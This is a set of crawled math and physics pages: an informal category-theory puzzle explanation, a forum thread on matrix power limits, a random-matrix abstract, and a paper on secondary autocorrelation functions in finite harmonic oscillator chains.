there's always exactly one arrow from $\{\}$ to any other corner $A$, including to $*$! So, for instance, there's a nice corner $\begin{array}{ccc} \{\} & \to & * \\ \downarrow & & \\ * \end{array}$ and because of the $\ulcorner$ pieces, this gets filled-in as $\begin{array}{ccc} \{\} & \to & * \\ \downarrow & \Box & \downarrow\\ * & \to & * + * \end{array}$ although it's more common, among my fellow puzzlers, to call that new thing $\mathbb{S}^0$. It has two points, as you can see. Oh! this one tile happens to be of *both* sorts: it's the standard tile to fill-in those two edges $*\to \mathbb{S}^0$ as well as the standard tile to fill-in the edge $\{\}\to*$ drawn twice from a single copy of $\{\}$. Sometimes it's fun just to look at the special pieces $\begin{array}{ccc} A & \to & * \\ \downarrow & \ulcorner & \downarrow \\ * & \to & \Sigma A \end{array}$ which highlight a fascinating sequence of corner labels $A, \Sigma A, \Sigma^2 A, \ldots$ --- the ones you get starting with $\mathbb{S}^0$ are called the spheres (or homotopy spheres) and have the special names $\mathbb{S}^n = \Sigma^n \mathbb{S}^0$. Going in the other direction --- if you have a favourite arrow $* \overset{a}{\to} A$, the special square you get is labelled $\begin{array}{ccc} \Omega_a A & \to & * \\ \downarrow & \lrcorner & \downarrow a\\ * & \underset{a}{\to} & A \end{array}$ ... to tell you how one is supposed to keep going after that, I have to tell you one last thing about the special squares labelled $\lrcorner$ and $\ulcorner$; given any square at all $\begin{array}{ccc} A & \overset{f}{\to} & B \\ g\downarrow & \Downarrow & \downarrow h\\ C & \underset{k}{\to} & D \end{array}$ there are of course the standard two squares $\begin{array}{ccc} P_{h,k} & \to & B \\ \downarrow & \lrcorner & \downarrow h\\ C & \underset{k}{\to} & D \end{array}$ and the other one to $Q_{f,g}$; in essence, what it means to be a $\lrcorner$ is that, there's essentially just one edge $A \overset{w}\to P_{h,k}$ that fits into this puzzle $\begin{array}{ccccc} A & \overset{=}{\to} & A & \overset{f}{\to} & B \\ =\downarrow & = & w \downarrow & \Downarrow & \downarrow = \\ A & \underset{w}{\to} & P_{h,k} & \to & B \\ g\downarrow & \Downarrow & \downarrow & \lrcorner & \downarrow h \\ C & \underset{=}{\to} & C & \underset{k}{\to} & D \end{array}$ There's a similar story about unique edges $Q_{f,g} \to D$ that fit in another puzzle --- try it and see! But particularly, since we always have this square $\begin{array}{ccc} * & \to & * \\ \downarrow & = & \downarrow a\\ * & \underset{a}{\to} & A \end{array}$ there's exactly one $* \to \Omega_a A$ that fits in all the necessary puzzles, and this is what lets us keep going to make new spaces $\Omega^2_a A, \cdots$. Here's a puzzle for you: come up with a good edge $A \to \Omega_{?} \Sigma A$! This entails finding a way to fill-in that $?$; you should be able to think of perhaps-two. There are lots of things I haven't mentioned, but of course, that will always be true, even if I say all the things that should come first! You're welcome to play with the jigsaw, too; we'll never run out of pieces! the joiner
2017-07-22 16:36:09
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5096129179000854, "perplexity": 456.40489674420746}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-30/segments/1500549424088.27/warc/CC-MAIN-20170722162708-20170722182708-00287.warc.gz"}
https://www.physicsforums.com/threads/convergence-of-matrix-equations.47411/
# Convergence of matrix equations 1. Oct 12, 2004 ### gogetagritz I am pretty rusty/unknowledgable when it comes to linear algebra, so when I was given the problem. Find the limit as n->infinity of A^n * b where a is a 2x2 matrix and b is a 2x1 vector, I scratched my head. A fellow student told me about the spectral radius being the largest eigen value of A, and if it is less than one then the equation converges to zero. However my eigenvalues are not less than one. So what methods are there for determing an actual x,y that this this system converges to? 2. Oct 13, 2004 ### matt grime since A is 2x2 it satisfies a second order polynomial, the characteristic equation. X^2+ uX + v=0 for some u,v in R So, A^n = -uA^{n-1}-vA^{n-2} for n greater than 2. if A^nb converges to anything at all can you see how to find what it converges to now?
2017-06-25 15:55:40
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9166150689125061, "perplexity": 655.5817221588397}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-26/segments/1498128320539.37/warc/CC-MAIN-20170625152316-20170625172316-00231.warc.gz"}
http://math-mprf.org/journal/articles/id1227/
The Random Matrix Technique of Ghosts and Shadows A. Edelman 2010, v.16, №4, 783-790 ABSTRACT We propose to abandon the notion that a random matrix exists only if it can be sampled. Much of today's applied finite random matrix theory concerns real or complex random matrices ($\beta=1,2$). The "threefold way" so named by Dyson in 1962 [F.J. Dyson, The threefold way. Algebraic structures of symmetry groups and ensembles in Quantum Mechanics. J. Math. Phys., 1963, v. 3, pp. 1199-1215] adds quaternions ($\beta=4$). While it is true there are only three real division algebras ($\beta$="dimension over the reals"), this mathematical fact while critical in some ways, in other ways is irrelevant and perhaps has been over interpreted over the decades. We introduce the notion of a "ghost" random matrix quantity that exists for every beta, and a shadow quantity which may be real or complex which allows for computation. Any number of computations have successfully given reasonable answers to date though difficulties remain in some cases. Though it may seem absurd to have a "three and a quarter" dimensional or "pi" dimensional algebra, that is exactly what we propose and what we compute with. In the end $\beta$ becomes a noisiness parameter rather than a dimension. Keywords: random matrix theory,ghost random variables
2017-04-25 01:00:56
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7232791185379028, "perplexity": 1152.2778516591516}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917120001.0/warc/CC-MAIN-20170423031200-00481-ip-10-145-167-34.ec2.internal.warc.gz"}
https://www.groundai.com/project/correlations-of-correlations-secondary-autocorrelations-in-finite-harmonic-systems/
Correlations of correlations: Secondary autocorrelations in finite harmonic systems # Correlations of correlations: Secondary autocorrelations in finite harmonic systems Dan Plyukhin Department of Computer Science, University of Toronto, Toronto, ON, Canada    Alex V. Plyukhin Department of Mathematics, Saint Anselm College, Manchester, NH, USA July 29, 2019 ###### Abstract The momentum or velocity autocorrelation function for a tagged oscillator in a finite harmonic system decays like that of an infinite system for short times, but exhibits erratic behavior at longer time scales. We introduce the autocorrelation function of the long-time noisy tail of (“a correlation of the correlation”), which characterizes the distribution of recurrence times. Remarkably, for harmonic systems with same-mass particles this secondary correlation may coincide with the primary correlation (when both functions are normalized) either exactly, or over a significant initial time interval. When the tagged particle is heavier than the rest, the equality does not hold, correlations shows non-random long-time scale pattern, and higher order correlations converge to the lowest normal mode. ###### pacs: 05.40.Ca, 05.20.Gg ## I Introduction The theme of fluctuations in finite systems of harmonic oscillators emerges naturally in both application and theory. From a theoretical point of view, the study of the stochastic dynamics of a tagged degree of freedom in finite harmonic systems provides a valuable illustration, and often more than that, of the role of the thermodynamic and weak-coupling limits, ergodicity, thermalization, recurrences, synchronization, and other basic concepts in nonequilibrium phenomena Zwanzig (); Mazur (); Cukier (); Kac (); Vig (); Jin (); Bend (). Another relevant area is Langevin dynamics generated by a coupling to a finite harmonic bath(s), and its application to mesoscopic systems and networks; see PS (); Hanggi (); Zhou (); Beims (); Onofrio (); Hasegawa (); Akai (). Being nonergodic, the capability of harmonic systems to illustrate general phenomena in statistical mechanics might seem doubtful at first glance. By means of a canonical transformation a harmonic system of any size can be transformed into a collection of independent oscillators, or normal modes; since the energies of normal modes are the integrals of motion, a single isolated harmonic system does not equilibrate and is not very interesting from the point of view of statistical mechanics. A more fruitful approach is to consider an ensemble of harmonic systems, assuming that in the past they were in contact with a larger thermal bath in equilibrium at a given temperature, and that the initial normal modes of the ensemble are distributed according to the canonical distribution. Within this framework, one evaluates statistical averages of dynamical variables over the ensemble of the system’s initial coordinates rather than over time. Such averages show the transition of the ensemble to thermal equilibrium in the limit of a large number of particles, and thus the nonergodic nature of harmonic systems does not explicitly manifest itself, and for most cases is inessential. It should however be stressed that this framework, which is standard for most works on stochastic dynamics of harmonic systems both classical and quantum, assumes a very special type of coupling between the system and the external thermal bath: this coupling justifies the initial conditions for the the system’s degrees of freedom, yet is assumed to be sufficiently weak, or completely turned off, as not to affect the system’s further dynamics. The inequivalence for harmonic systems of ensemble- and time-averages, together with the almost exclusive exploitation in literature of the former, does not necessarily entail that the latter are inadequate. Rather, we introduce in this paper a new class of time-average correlations (we call these secondary correlations) which characterize recurrences in finite harmonic systems. For systems of same-mass particles, these correlations are shown to be very close, and under certain conditions exactly identical, to the conventional (primary) time correlations defined with ensemble averaging. This implies that for finite nonergodic systems, the use of both ensemble and time averages may give meaningful complementary descriptions, and that correlations with the two types of averaging may be related in some subtle way. ## Ii Secondary correlations Consider the temporal autocorrelation function of a dynamical variable in a finite system of size - typically, such a function exhibits two distinctive regimes, separated by a crossover time of order , where is the speed of signal propagation in the system. For short times , the variable does not feel the presence of the boundaries, and the correlation function decays in a smooth regular way, following the same laws as for an infinitely large system. On the other hand, for longer times the dynamics of the variable are affected by signals reflected from the boundaries. For long time regimes such as this, rather than decaying smoothly the correlation functions may exhibit erratic, apparently noisy, behavior Zwanzig (); Mazur (). We illustrate this behavior in Fig. 1 by way of the normalized momentum correlation function for the central particle in a harmonic chain with fixed ends. The Hamiltonian of the system is H=12mN∑i=1p2i+mω22N∑i=0(qi−qi+1)2, (1) which describes linearly coupled particles indexed with terminal particles fixed, with displacement . Assuming is odd, the middle particle indexed i0=N+12 (2) has normalized () momentum correlation function Ci0(t)=1⟨p2i0(0)⟩⟨pi0(0)pi0(t)⟩=2N+1N∑∑′j=1cosωjt, (3) where the prime indicates that the summation is only over odd . In this expression (we outline its derivation in the Appendix), the terms are frequencies of normal modes ωj=2ωsinπj2(N+1) (4) where is the frequency of a single oscillator, and the average is taken over the equilibrium ensemble of initial conditions. For the correlation function is very close to that of an infinite chain, given by the Bessel function Ci(t)≈C∞(t)=limi,N→∞Ci(t)=J0(2ωt). (5) This can be readily justified by approximating the sum (3) with an integral, and recognizing the latter as the well-known integral representation of , see e.g. Lee (); PS (). More interesting from the perspective of this paper is the regime in which the correlation becomes irregular, see Fig. 1. It can be shown that the function given by (3) belongs to the class of almost periodic functions: any value which the function achieves once is achieved again, infinitely many times. Traditionally, such functions are characterized by the average frequency with which they return to , or by the reciprocal, i.e. the mean recurrence time . For correlations of type (3) with large , the famous result for the recurrence time, first obtained by Kac Kac () (see also Zwanzig (); Mazur (); Vig ()), τ(c)∼eNc2 (6) implies that recurrences of order or larger are exponentially rare. This result resolves, or rather (being derived for a model system) shows the direction of resolution for the paradoxes of irreversibility Zwanzig (). In this paper we propose to characterize the irregular part of the function in another way, which is more in the spirit of nonequilibrium statistical mechanics than the mathematics of almost periodic functions. Namely, observing that for large the correlation function appears to behave like stationary noise, we are encouraged to characterize it by a new correlation function Di(t)=1⟨C2i(τ)⟩τ⟨Ci(τ)Ci(τ+t)⟩τ (7) defined with the time average ⟨...⟩τ=limT→∞1T∫T0(...)dτ. (8) Since we are only interested in the interval when behaves irregularly, one might prefer to set the lower integration limit in definition (8) to instead of zero. However this would only be an unnecessary complication, as the limit makes the two definitions numerically equivalent (assuming always that the integral from to converges). We shall refer to , defined by relations (7) and (8), as the secondary correlation function, and call the primary one. We would like to promote the secondary correlation as a meaningful statistical tool for characterizing the distribution of recurrences times in a system of finite size. Such information is not contained in the Kac formula (6) for the average recurrence time , so the two functions and do not duplicate each other but describe recurrences in complementary ways. ## Iii Relation to primary correlations Since the primary and secondary correlations and characterize recurrences at different levels and are defined using different types of averaging (over ensemble and time, respectively), the existence of any specific relation between them is perhaps a priori unexpected. Yet a simple numerical experiment with Eqs. (1-6) suggests, for the middle atom of a chain with fixed ends, the equality Ci0(t)=Di0(t). (9) Closer scrutiny reveals that the equality is exact and holds for any , such that the secondary correlation completely repeats the structure of the primary one for both regular () and noisy () domains and has the same crossover time . The proof follows immediately from the relation ⟨cosωjτcosωj′(τ+t)⟩τ=δjj′2cosωjt (10) which holds for an arbitrary spectrum of (nonzero) normal mode frequencies and can be verified by direct evaluation (with the help of L’Hospital’s rule). For this may further be reduced to the familiar orthogonality relation for the Fourier basis, and thus can be considered a generalized form of the latter. From (3) and (10) one obtains for the non-normalized secondary correlation ⟨Ci0(τ)Ci0(τ+t)⟩τ= (2N+1)2N∑∑′j,k=1⟨cosωjτcosωk(τ+t)⟩τ= 12(2N+1)2N∑∑′j=1cosωjt. (11) Normalizing this function to unity at by dividing it by ⟨C2i0(τ)⟩τ=12(2N+1)2N+12=1N+1, (12) one obtains the normalized secondary correlation Di0(t)=⟨Ci0(τ)Ci0(τ+t)⟩τ⟨C2i0(τ)⟩τ=2N+1N∑∑′j=1cosωjt (13) which coincides with the primary correlation , Eq.(3). One may observe that for the above derivation it is essential that the primary correlation takes the form of a superposition of cosines with equal weights, as in Eq. (3). In general this, of course, is not the case. For example, for a chain with fixed ends described by the Hamiltonian (1), the normalized momentum correlation function for particle with arbitrary index has the form (see Appendix) Ci(t)=N∑j=1A2ijcosωjt,Aij=√2N+1sinπijN+1. (14) For the middle particle this is reduced to (3), whereas for the other particles normal modes enter the expression (14) with different amplitudes . As one can immediately verify, the exact equality of primary and secondary correlations does not hold in these cases. An important example when this equality does hold for any particle is a harmonic chain with periodic boundary conditions. In this case the momentum correlation for each particle is a superposition of equally weighted normal modes Mazur (); Zwanzig () Ci(t)=1NN−1∑j=0cosωjt,ωj=2ωsin(πjN), (15) and repetition of the above derivation leads again to the exact equality for any particle of the system. So far, even with the above examples of its validity, the equality of primary and secondary correlations may appear as no more than a curious coincidence. However, further numerical exercises reveal that even when equality does not hold exactly, it remains a very good approximation for the initial time interval , see Fig. 2. The duration of this interval, , is found to depend non-monotonically on particle position , and for any be equal or shorter than the crossover time, . Respectively, for both primary and secondary correlations coincide with the primary correlation for the infinite chain, Di(t)=Ci(t)=C∞(t)=J0(2ωt),t The proof of the approximate equality (16) can be carried out as follows. From the expression (14) for and the definition (7) for , and using the relation (10), one gets Di(t)=1N∑j=1A4ijN∑j=1A4ijcosωjt, (17) or taking into account the expression (4) for normal mode frequencies Di(t)=1N∑j=1A4ijN∑j=1A4ijcos[2ωtsin(πj2(N+1))]. (18) Recognizing here the generating function for Bessel functions cos(xsinθ)=J0(x)+2∞∑k=1J2k(x)cos(2kθ), (19) can be written as a superposition of Bessel functions Di(t)=J0(2ωt)+∞∑k=1SikJ2k(2ωt), (20) with coefficients Sik=2N∑j=1A4ijN∑j=1A4ijcos(πjkN+1). (21) A simple analysis of this expression shows that given , the coefficients are nonzero only for five sets of : Sik=⎧⎪ ⎪ ⎪ ⎪ ⎪ ⎪ ⎪ ⎪⎨⎪ ⎪ ⎪ ⎪ ⎪ ⎪ ⎪ ⎪⎩2,k=2(N+1)s−4/3,k=2(N+1)s−2i−4/3,k=2(N+1)(s−1)+2i1/3,k=2(N+1)s−4i1/3,k=2(N+1)(s−1)+4i0,otherwise (22) where Note that this expression is invariant under the transformations , reflecting the symmetry of the left and right sides of the chain. One can observe that for large and not too close to the end or to the middle of the chain the coefficients are nonzero only for large indices . For instance, for the chain with and the particle , coefficients are nonzero only for As a result, for not too large in the expression (20), the dominating contribution comes from the first term , while the corrections given by the sum involve Bessel functions of large orders which are negligibly small for a significant time interval  Stegun (). The above consideration not only justifies the equality for , but also accounts for a curious non-monotonic dependence of on the tagged particle index , which we noticed empirically in Fig. 2. For example, according to (22), for and particles the minimal indices for which takes nonzero values () are , respectively. Then keeping only the leading and first correction terms in the exact expression (20), one gets D20(t) = J0(2ωt)−43J80(2ωt), D30(t) = J0(2ωt)−43J120(2ωt), D40(t) = J0(2ωt)+13J88(2ωt). (23) One can verify that these approximations describe the initial deviation of from very well indeed (Fig. 3 shows this for particle and ). Since for small arguments decreases with order , it is clear from (23) that the second correction terms for particles involve Bessel functions of smaller orders, and thus become essential at earlier times than for particle . If one applies a similar analysis to the primary correlations , Eq. (14), one gets a familiar approximate relation for the left side of the chain Vig (); Lee (); PS () Ci(t)=J0(2ωt)−J4i(2ωt). (24) Here, in contrast to corresponding relations (23) for , the order of the second Bessel function, which describes effects of finite size, increases monotonically (linearly) with particle index , and so does the crossover time . In order to study the dependence of the characteristic time , during which , on in a more quantitative way, let us consider the function δi(t)=Ci(t)−Di(t), (25) which is zero when the two correlations coincide for and fluctuates at longer times. For a given , let us define somewhat arbitrarily as the time at which reaches its first local minimum or maximum; see Fig. 4(a). Similarly, we can define the crossover time as the moment when the function Δi(t)=Ci(t)−C∞(t) (26) has its first local extremum, recalling that is the correlation in an infinite system. Using these definitions, we record observations of and for in Fig. 4(b), as a function of particle index . Whereas increases linearly as we approach the central particle, coincides with for and linearly decreases for . As we already know, the primary and secondary correlations coincide for the middle particle , so is identically and diverges here. Somewhat unexpectedly, we find that also diverges, i.e. identically, for (and of course the symmetric case ). Therefore it would appear that diverges whenever it changes from increasing to decreasing, or vice versa. Further calculations for different show that in general the exact equality holds for particles with indices i0=N+12,i1=N+13,i2=2(N+1)3 (27) provided of course that these expressions are integers. For there are three such particles (), two for (), and none for . Let us show that this phenomenon is readily accounted for with Eqs.(20)-(22) for the secondary correlation . First, from inspecting (22) one might observe that for the minimum for which is non-zero is and comes from the set with . This yields the approximation Di(t)=J0(2ωt)−43J4i(2ωt), (28) which we already used for and in (23). It differs from the corresponding approximation (24) for only by the factor in the second term. Then, from (28) and (24), the difference functions defined above by relations (25) and (26) take the form δi(t)=13J4i(2ωt),Δi(t)=−J4i(2ωt). (29) Since these two functions have local extrema at the same time, by definition we have . Furthermore, since the position of the first maximum of the Bessel function increases approximately linear with  Watson (), Eq. (29) explains the equality of the characteristic times and their linear increase for in Fig. 4(b). As gets larger still, one observes from (22) that a minimal for which is and comes from the set with . In this case for , instead of (28), we have another approximation Di(t) = J0(2ωt)+13Jα(2ωt), α = 4(N+1)−8i, (30) which we already used for in (23). Since the primary correlation is still given by (24), the difference function in this case reads δi(t)=−13Jα(2ωt)−J4i(2ωt)≈−13Jα(2ωt). (31) The position of its first extremum increases approximately linearly with  Watson () and, as follows from (30), linearly decreases with . This explains the behavior of for in Fig. 4(b). The transition of from a positive to a negative slope (over the domain ) occurs at , for which (the minimal value of the set ) becomes less than or equal to (the minimal value of the set ). Then the equality gives , which is consistent with our empirical findings (27). The exact equality for given by (27) can be readily verified using the following expression for the primary correlations Ci(t)=J0(2ωt)+∞∑k=1TikJ2k(2ωt), (32) with coefficients Tik=2N∑j=1A2ijcos(πjkN+1). (33) These relations are similar to (20) and (21) for and can be derived in a similar way PS (). For given by (27), one can verify directly from (33) and (21) that for any . Then the comparison of (32) and (20) gives for those values of the exact equality . ## Iv Heavy impurity problem So far we have discussed finite harmonic systems of similar particles. If a tagged particle is heavier than the rest, it turns out that the equality of primary and secondary correlations, and , does not hold. Though structurally similar - looks like a coarse-grained copy of - the two correlations are quite distinctive on any time scale; see Fig. 5. In particular, the approximation of exponential relaxation for , while good for , is noticeably worse for . Another observation is that for both correlations, being apparently random on a short time scale, show on a larger scale a noisy yet periodically repeating pattern; see the bottom plot in Fig. 5. This feature, absent in systems of equal-mass particles, is made all the more obvious when considering higher order correlation functions , defined recursively as Ck+1(t)=⟨Ck(τ)Ck(τ+t)⟩τ⟨C2k(τ)⟩τ, (34) assuming new notations for and . (In this section we use the notation with a subscript referring to the correlation order, rather than to the index of a particle). For the heavy impurity problem one finds that as the order increases the apparent randomness of correlations on the time scale quickly diminishes, and higher correlations converge to the normal mode with the lowest eigenfrequency : Ck(t)→cos(Ω1t); (35) see Fig. 6. Below we outline a theoretical framework underlying these empirical observations. Consider a cyclic chain of particles of mass and an impurity of mass described by the Hamiltonian H = P22M+2N∑i=1p2i2m+mω222N−1∑i=1(qi−qi+1)2 (36) + mω22[(Q−q1)2+(Q−q2N)2], where and are the momentum and coordinates of the impurity. Using a diagonalization method similar to that described in the Appendix (see Cukier () for details), one can show that the normalized momentum correlation function for the impurity is again an almost periodic function, now of the form C(t)≡C1(t)=2N−1∑j=0,1,3,⋯AjcosΩjt. (37) The amplitudes in this expression are given by Aj={1+2N−1∑i=1,3,⋯ϵ2i(Ω2j−ω2i)2}−1. (38) where ωi = 2ωsiniπ2(2N+1), ϵi = −2μ12ω2(22N+1)12siniπ2N+1, (39) and is the mass ratio. Due to the system’s symmetry only the modes with zero and odd indices contribute to the superposition (37). Their frequencies ( for cannot be expressed in closed form and must be evaluated as roots of the secular equation Cukier () G(z)=z2−2μω2−2N−1∑i=1,3,⋯ϵ2iz2−ω2i=0. (40) This transcendental equation has solutions , . It can be verified that one solution is the zero frequency , which reflects the translational invariance of the system. The remaining nonzero roots lie in the interval and must be evaluated numerically. With the set of eigenfrequencies found, one may calculate the amplitudes with (38) and evaluate the primary correlation by carrying out the summation in (37). Then, using (10), for the secondary correlation one obtains D(t)=C2(t)=c2{A20+122N−1∑j=1,3,⋯A2jcosΩjt} (41) with normalization coefficient c2=(A20+122N−1∑j=1,3,⋯A2j)−1. (42) Fig. 5 presents and , calculated with Eqs. (37) and (41), for and . In a similar manner, one can obtain the expression for order- correlations from (34) Ck(t)=ck{Aαk0+2N−1∑j=1,3,⋯(Aj√2)αkcosΩjt} (43) with powers and normalization coefficient ck={Aαk0+2N−1∑j=1,3,⋯(Aj√2)αk}−1. (44) While expression (43) is a superposition of modes, one can observe that for larger the main contribution comes from the mode with eigenfrequency , such that . This can be accounted for by noticing that the sequence of coefficients has as its maximum element and is monotonically decreasing for . For example, for and we find that (approximately). For the primary and secondary correlations involving and respectively, such an insignificant difference in values hardly plays a role. But for higher-order correlations the maximum of the set (still at ) may be orders of magnitude greater than any other element. As a result, the superposition in (43) is increasingly dominated by the term with , and higher-order correlations quickly converge to the first normal mode; . For systems of same-mass particles the set of normal mode amplitudes, given by the second equation in (14), is a periodic function of the mode index and has no single maximum. In this case the reduction of higher-order correlations to a dominating normal mode does not occur. ## V Conclusion Temporal autocorrelation functions are often evaluated in the thermodynamic limit, in which case they typically decrease in a regular (non-random) fashion, either monotonically or non-monotonically. In finite systems, autocorrelation functions themselves become noisy at long time scales ; this illustrates recurrences in the dynamics of the tagged variable due to reflections of sound off boundaries. In this paper we introduced and studied some properties of the secondary correlation function defined as an autocorrelation function of the primary correlation function . If it exists, the characteristic time of decay for determines the time-scale of a typical “period” for , which in turn may be associated with the typical recurrence time of the targeted variable. These “typical” times may however be ill-defined mathematically (as is indeed the case for the harmonic systems discussed above), so to be more precise the secondary correlation can be described as a function characterizing a distribution of recurrence times: for a given , a larger value for corresponds to a greater probability (density) that will return to an assigned value in time about . Comparing the secondary correlation with the mean recurrence time , Eq. (6), the latter being more prevalent in literature, one notices that the two functions give complementary descriptions: while characterizes the number of returns to an assigned value , the secondary correlation gives the distribution of return times regardless of the assigned value of . One interesting result is the equality for systems of same-mass particles. The equality is either exact for all or a very good approximation over the initial interval whose duration depends on the tagged particle’s position non-monotonically. Although its derivation is quite simple, the equality of primary and secondary correlations may be a remarkable property, especially considering that the former is defined over the ensemble and the latter with time averaging. We restricted the discussion to the simplest case of one-dimensional harmonic systems, but an extension to higher dimensions appears to be straightforward. Whether the equality, or perhaps some other relation, between primary and secondary correlations still holds for nonlinear systems is an open question. Like the primary correlation, for long time-scales the secondary correlations also develop noisy tails (see the insets in Fig. 3), which themselves can be characterized by correlations of higher order. In turn, this new tertiary function has the same structure as the secondary and primary functions, exhibiting regular decay over shorter times and fluctuating over longer times. Thus one can construct an infinite hierarchy of higher order correlations whose order-scaling properties are also interesting to study. Of course, for the particular cases when the equality holds exactly for all , e.g. a harmonic chain with periodic boundary conditions, all higher order correlations are identical. We have studied higher correlations in the context of the heavy impurity problem. Here the equality of primary and secondary correlations does not hold, and the primarily correlation displays a non-random idiomatic pattern on long time scales, which becomes even more visible in correlations of higher orders. Indeed the sequence of higher-order correlations converges to the lowest normal mode. ###### Acknowledgements. We thank S. Shea and V. Dudnik for discussion and the anonymous referee for important suggestions. ## Appendix In this appendix we outline the derivation of expressions (3) and (14) for the momentum correlation functions of -th particle in a harmonic chain with fixed ends, described by the Hamiltonian (1). Using the normal mode transformation qi=1√mN∑j=1AijQj,pi=√mN∑j=1AijPj with coefficients given by (14) and taking into account the orthogonality relation , the Hamiltonian (1) is diagonalized into the form of uncoupled normal modes H=12N∑j=1{P2j+ω2jQ2j} with frequencies given by (4). The normal modes are governed by the Hamiltonian equations ˙Pj=−∂H∂Qj=−ω2jQj,˙Qj=∂H∂Pj=Pj, and evolve as Pj(t) = Pj(0)cosωjt−ωjQj(0)sinωjt, Qj(t) = Qj(0)cosωjt+ω−1jPj(0)sinωjt. Assuming that initially the system is in equilibrium with canonical distribution function , correlations of the normal modes’ initial values are and . Then ⟨Pj′(0)Pj(t)⟩=⟨Pj′(0)Pj(0)⟩cosωjt=δjj′βcosωjt and the momentum correlation of the -th particle is ⟨pi(0)pi(t)⟩ = mN∑j,j′=1AijAij′⟨Pj′(0)Pj(t)⟩ = mβN∑j=1A2ijcosωjt. Division of this expression by gives the normalized correlation function (14). In the case of the middle particle (assuming is odd), for odd and zero otherwise. In this case, one obtains the normalized correlation function in the form (3). The correlation (15) corresponding to the periodic boundary condition can be derived in a similar way. For the extension to the heavy impurity problem see e.g. Cukier (). ## References • (1) R. Zwanzig, Nonequilibrium Statistical Mechanics, Oxford University Press, New York (2001), Ch.10. • (2) P. Mazur and E. Montroll, J. Math. Phys. 1, 70-84 (1960). • (3) R. I. Cukier and P. Mazur, Physica 53, 157 (1971). • (4) M. Kac, Am. J. Math. 65, 609 (1943). • (5) J. O. Vigfusson, Physica A 98, 215 (1979). • (6) F. Jin, T. Neuhaus, K. Michielsen, S. Miyashita, M. A. Novotny, M. I. Katsnelson, and H. De Raedt, New J. Phys. 15, 033009 (2013). • (7) V. A. Benderskii and E. I. Kats, JETP 116, 1 (2013). • (8) J. Florencio and M. H. Lee, Phys. Rev. A 31, 3231 (1985). • (9) P. Hänggi and G.-L. Ingold, Chaos 15, 026105 (2005). • (10) A.V. Plyukhin and J. Schofield, Phys. Rev. E 64, 041103 (2001). • (11) H.-X. Zhou and R. Zwanzig, J. Phys. Chem. A 106, 7562 (2002). • (12) J. Rosa and M. W. Beims, Phys. Rev. E 78, 031126 (2008). • (13) Q. Wei, S. T. Smith, and R. Onofrio, Phys. Rev. E 79, 031128 (2009). • (14) H. Hasegawa, Phys. Rev. E 83, 021104 (2011); 84, 011145 (2011). • (15) A. Carcaterra and A. Akay, Phys. Rev. E 84, 011121 (2011). • (16) M. Abramowitz and I. A. Stegun, Handbook of Mathematical Functions, Dover, New York (1972). • (17) G. N. Watson, A Treatise on the Theory of Bessel Functions, Cambridge University Press, Cambridge (1995), p. 521. You are adding the first comment! How to quickly get a good reply: • Give credit where it’s due by listing out the positive aspects of a paper before getting into which changes should be made. • Be specific in your critique, and provide supporting evidence with appropriate references to substantiate general statements. • Your comment should inspire ideas to flow and help the author improves the paper. The better we are at sharing our knowledge with each other, the faster we move forward. The feedback must be of minimum 40 characters and the title a minimum of 5 characters
2020-08-08 00:17:34
